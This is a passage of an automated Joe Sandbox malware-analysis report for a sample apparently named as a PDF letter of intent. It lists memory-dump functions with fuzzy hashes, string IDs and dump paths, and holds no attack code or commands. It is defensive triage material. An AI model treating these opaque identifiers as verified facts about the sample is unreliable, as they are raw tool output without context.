                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: $$$
                                                                                      • API String ID: 3446177414-233714265
                                                                                      • Opcode ID: 330e99c4ac00987747a313c0a2bc7def792e68eca10535b2e9e8ba6a0b59f945
                                                                                      • Instruction ID: 4752e14dd7001b4686a8ec12d585c0b03a01b017c63da466c3216ed53392515a
                                                                                      • Opcode Fuzzy Hash: 330e99c4ac00987747a313c0a2bc7def792e68eca10535b2e9e8ba6a0b59f945
                                                                                      • Instruction Fuzzy Hash: 6A61AB75A00749DFEB20CFA4C5A0B9DB7B1BF44708F104A69D6156F640DBB6A941CF90
                                                                                      Function 330235BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                      • API String ID: 0-118005554
                                                                                      • Opcode ID: eb806665687dcd446ce322fada0727ea081e3fe0848b1f881baab335422fc931
                                                                                      • Instruction ID: 315deae121ac9fc60b55cb44a985dfd5837df1f80a993014a97b881824d07c39
                                                                                      • Opcode Fuzzy Hash: eb806665687dcd446ce322fada0727ea081e3fe0848b1f881baab335422fc931
                                                                                      • Instruction Fuzzy Hash: 6D31EB752087459FD301CB68D958B2ABBE8EF84754F0848E9F990CB390EB70D805CB92
                                                                                      Function 32FC329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: .Local\$@
                                                                                      • API String ID: 0-380025441
                                                                                      • Opcode ID: 77d2f1ba054298947ec3736c477a0c9a6b2708246a74a698782ba3446d43b872
                                                                                      • Instruction ID: d2e50c9684ead18ef9c6defad292b97ede7ea97704e666b8f13c966848d90911
                                                                                      • Opcode Fuzzy Hash: 77d2f1ba054298947ec3736c477a0c9a6b2708246a74a698782ba3446d43b872
                                                                                      • Instruction Fuzzy Hash: 513190B6508315AFD310CF28C880A5BBBE8FBC5794F440D2EFA9487250DA31DD08CB92
                                                                                      Function 32FC34B0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • RtlpInitializeAssemblyStorageMap, xrefs: 33002A90
                                                                                      • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 33002A95
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                      • API String ID: 0-2653619699
                                                                                      • Opcode ID: 90c3b4be8f7f941498114420addd020ea9c400b30a741b742efe3a4bf5465ded
                                                                                      • Instruction ID: 5ec88b9d5a695262cfebb52bdc3c50c351333a07cd3ea1395d6994687caa61a2
                                                                                      • Opcode Fuzzy Hash: 90c3b4be8f7f941498114420addd020ea9c400b30a741b742efe3a4bf5465ded
                                                                                      • Instruction Fuzzy Hash: 6311EC76B00315ABF7198A48CE81F5B77ED9B95B94F1484697B04EB244DEB4CD008BA0
                                                                                      Function 32F91131 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: 62ce582136fb3f9bb3c83c45416b54f0a62d753d2c762b483eb98ca70c99735a
                                                                                      • Instruction ID: 06608c3c931d634546cc7a9be51a277b601ba456f6b761a4ec1f93634094296a
                                                                                      • Opcode Fuzzy Hash: 62ce582136fb3f9bb3c83c45416b54f0a62d753d2c762b483eb98ca70c99735a
                                                                                      • Instruction Fuzzy Hash: 53B110B56083808FE355CF28C580A5ABBE1BF88744F544E6EE99ACB352D770E845CF42
                                                                                      Function 32F97370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8ec745e36d7b23caeffba0bf070ea1d239cb3d542a73672825c8835900a637f0
                                                                                      • Instruction ID: 91d32103a22bd24039bb762f8d3de757ed50bc096338f640c9366196b7793261
                                                                                      • Opcode Fuzzy Hash: 8ec745e36d7b23caeffba0bf070ea1d239cb3d542a73672825c8835900a637f0
                                                                                      • Instruction Fuzzy Hash: E4A169B5A08341DFE314CF28C580A5ABBE5BF88744F104D6EEA859B351EB70E945CF92
                                                                                      Function 32F97703 Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b6518c19724770f23ff5f3672316848e915de79d3e4111e8e32f1122bda572df
                                                                                      • Instruction ID: 2782d52d4c3bac82516a68ac3fa1d89f7bd3a634f29fc537730c1f67232ce550
                                                                                      • Opcode Fuzzy Hash: b6518c19724770f23ff5f3672316848e915de79d3e4111e8e32f1122bda572df
                                                                                      • Instruction Fuzzy Hash: 8C6153B5A00706EFEB08DF68C450BADFBB5BF84344F248969D619A7300DB71A945CB90
                                                                                      Function 32FCF603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 350805c945692a74946b8799f5918e96a42ca91147710d07f2071f2c9b073b71
                                                                                      • Instruction ID: 23e9287f32f8115a831aa25af732c5c45b522fee4ecaa984c22bd5d7ba08808c
                                                                                      • Opcode Fuzzy Hash: 350805c945692a74946b8799f5918e96a42ca91147710d07f2071f2c9b073b71
                                                                                      • Instruction Fuzzy Hash: 244149B8D00298DFDB14DFA9C480AAEFBF4BF48340F504A6ED659A7215DB319941DF60
                                                                                      Function 33041AA3 Relevance: 1.6, Strings: 1, Instructions: 370COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: .
                                                                                      • API String ID: 0-248832578
                                                                                      • Opcode ID: 318e145cea58e0139e0b19464b5ee8dee902ded8abfbfbba77f8e6127b8e3132
                                                                                      • Instruction ID: 38bae3b34741b9b47f8517d54d5187d8cc463fa1e24d2d77db9d8b30bb74179a
                                                                                      • Opcode Fuzzy Hash: 318e145cea58e0139e0b19464b5ee8dee902ded8abfbfbba77f8e6127b8e3132
                                                                                      • Instruction Fuzzy Hash: 81E19079D002689FDB18CF9AC8407ADB7F5FF44740F9481AAE885AB290D7749E92CF50
                                                                                      Function 32F8B480 Relevance: 1.6, APIs: 1, Instructions: 100timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: e3030a1e09ac8aa7471a6841c2a8f22a0915bee471a83d007734f826ca511600
                                                                                      • Instruction ID: 1d39b202886ead72c92302a1e7512881c4ecacb48182956405016dc4c246ebae
                                                                                      • Opcode Fuzzy Hash: e3030a1e09ac8aa7471a6841c2a8f22a0915bee471a83d007734f826ca511600
                                                                                      • Instruction Fuzzy Hash: 3A310072600204AFC311DF14C880A5AB7E5FF85764F504A69EE659F395DB31ED42CBD0
                                                                                      Function 32F957C0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: 0d9f346c2c271436522e7b3cb55e375ca40343e32f89b41a521878522bfa666e
                                                                                      • Instruction ID: 6299be2a95d8abf100a56c8b599f072bc27385be76db7a98001c629df0a91bd8
                                                                                      • Opcode Fuzzy Hash: 0d9f346c2c271436522e7b3cb55e375ca40343e32f89b41a521878522bfa666e
                                                                                      • Instruction Fuzzy Hash: E2318F36715A09FFE7459B64CA40E99BBA6FF84344F405869EE0187F60DB71E831CB80
                                                                                      Function 32F93616 Relevance: 1.6, APIs: 1, Instructions: 84timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: a5a776e242ff69978665b3066b9b3374a9f90f90a7b967bea6f9686d99761666
                                                                                      • Instruction ID: 9ad5ad9f4decdbe34bfc1e32aaff9dea76c62ea012c11d1061d13da7490e60e4
                                                                                      • Opcode Fuzzy Hash: a5a776e242ff69978665b3066b9b3374a9f90f90a7b967bea6f9686d99761666
                                                                                      • Instruction Fuzzy Hash: B421F0352062589FE7219F04C994B9ABBA1FF80B14F414CA9EF414BB55CAB0E844CFC2
                                                                                      Function 32F892FF Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: f2655e5550add9ccc55b9938ae107d8e4f3f0df5052f16835c3d11752359cf80
                                                                                      • Instruction ID: 5c14e31d52c5b918b2b5a95f2e8e90b3675db7a6f7fa0a527f6f978180a6555f
                                                                                      • Opcode Fuzzy Hash: f2655e5550add9ccc55b9938ae107d8e4f3f0df5052f16835c3d11752359cf80
                                                                                      • Instruction Fuzzy Hash: E2F09A32204644AFD731AB59DD04F9ABBEDEF84B50F180919AA4693690DAA1A909CA60
                                                                                      Function 32F9973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @
                                                                                      • API String ID: 0-2766056989
                                                                                      • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                                      • Instruction ID: a35de70f86090af194119a31893fa6ba9e89c64535025246579e375924dd6ab7
                                                                                      • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                                      • Instruction Fuzzy Hash: 09617D76D00259AFEB11CFA5C840FDEBBB4FF84754F51492AEA10B7290DB718A01CB90
                                                                                      Function 3305132D Relevance: 1.4, Strings: 1, Instructions: 188COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: /ntO
                                                                                      • API String ID: 0-913073837
                                                                                      • Opcode ID: 4cd600643f032dfaf4ae91e945340702fc7d6eb42dbdd0fba9821ffb7d48b1e7
                                                                                      • Instruction ID: 46761aa6665e5bd7260b063e7dd8ed0ea2a823fb83138bc02e3dbb49965e35b4
                                                                                      • Opcode Fuzzy Hash: 4cd600643f032dfaf4ae91e945340702fc7d6eb42dbdd0fba9821ffb7d48b1e7
                                                                                      • Instruction Fuzzy Hash: 06816E75A04209DFDB09CF58C590AAEBBF1FF88300F1581A9E859EB351D734EA51CB90
                                                                                      Function 3301F7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @
                                                                                      • API String ID: 0-2766056989
                                                                                      • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                                      • Instruction ID: c93ff9503f8db5e7f69671b2a960d6a1b6f8b6dc6f32710d8982f60efcdc5ce5
                                                                                      • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                                      • Instruction Fuzzy Hash: 7C51BDB6914305AFE7119F14C840F6BB7E8FB84790F440A69BA8097291DBB1ED24CB91
                                                                                      Function 3304B256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PreferredUILanguages
                                                                                      • API String ID: 0-1884656846
                                                                                      • Opcode ID: 3839b820e3760913b88d4b48b5828cfb6b750da13e919f10c9139ebd45169354
                                                                                      • Instruction ID: 5055d00670cc3f6720e7341355db4d4c6c8f80be3343e050daa1190fadc923ae
                                                                                      • Opcode Fuzzy Hash: 3839b820e3760913b88d4b48b5828cfb6b750da13e919f10c9139ebd45169354
                                                                                      • Instruction Fuzzy Hash: 2A41C3B6D00219ABDB11DA96C840AEEB3B9EF44751F0505B6E981E7250E6F0DF40CFA4
                                                                                      Function 330197A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: verifier.dll
                                                                                      • API String ID: 0-3265496382
                                                                                      • Opcode ID: 029a0ee2334dc373caeb42f222391a9e66b6bc50a4ea41198a8d8c1f1479665c
                                                                                      • Instruction ID: 43247b7c5ffa77c4d82f1a1e2c26564ce58ce0177e37eef5598999390caf7687
                                                                                      • Opcode Fuzzy Hash: 029a0ee2334dc373caeb42f222391a9e66b6bc50a4ea41198a8d8c1f1479665c
                                                                                      • Instruction Fuzzy Hash: E631C5BDE003029FE7149F68D850B6673E5EB49750F9484BAE586DF380EAB18C81C7D0
                                                                                      Function 32FC7505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: #
                                                                                      • API String ID: 0-1885708031
                                                                                      • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                                                      • Instruction ID: 6f1b92f49d320deb6ab806c67ba92def8b3dbe1cefe254da492cf1729eced819
                                                                                      • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                                                      • Instruction Fuzzy Hash: B44191BAA00626ABEB15CF44C890BBEB7B9FF44751F004C5AEA4197340DB74D981CBA1
                                                                                      Function 32F95096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Actx
                                                                                      • API String ID: 0-89312691
                                                                                      • Opcode ID: 01c8ee5562857bc8280c12be9fc8869e7a5d1076078e090e1c9f312abb9278a4
                                                                                      • Instruction ID: 199a60268faa7b83e24939e7fa931a3733ce3dbc8c6096157ea9e54b5c1afd0b
                                                                                      • Opcode Fuzzy Hash: 01c8ee5562857bc8280c12be9fc8869e7a5d1076078e090e1c9f312abb9278a4
                                                                                      • Instruction Fuzzy Hash: 291193763087138BF719491988507B67395EB91B68F308D2AEB50CB3A0DE71D885CB80
                                                                                      Function 3301106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrCreateEnclave
                                                                                      • API String ID: 0-3262589265
                                                                                      • Opcode ID: 6cc32c08818d56870b4fe860b3bb422136d1b2d327c68706521cdfca22740e6f
                                                                                      • Instruction ID: a2f39a1fa49af9fddc050f91b3e629282ed311ecb3acec915ed29202ab502b9b
                                                                                      • Opcode Fuzzy Hash: 6cc32c08818d56870b4fe860b3bb422136d1b2d327c68706521cdfca22740e6f
                                                                                      • Instruction Fuzzy Hash: E72132B59183449FC314DF2AC904A4BFBE8BFD5B50F000A5FBAA49B250DBB09405CB96
                                                                                      Function 32FE739A Relevance: .7, Instructions: 705COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
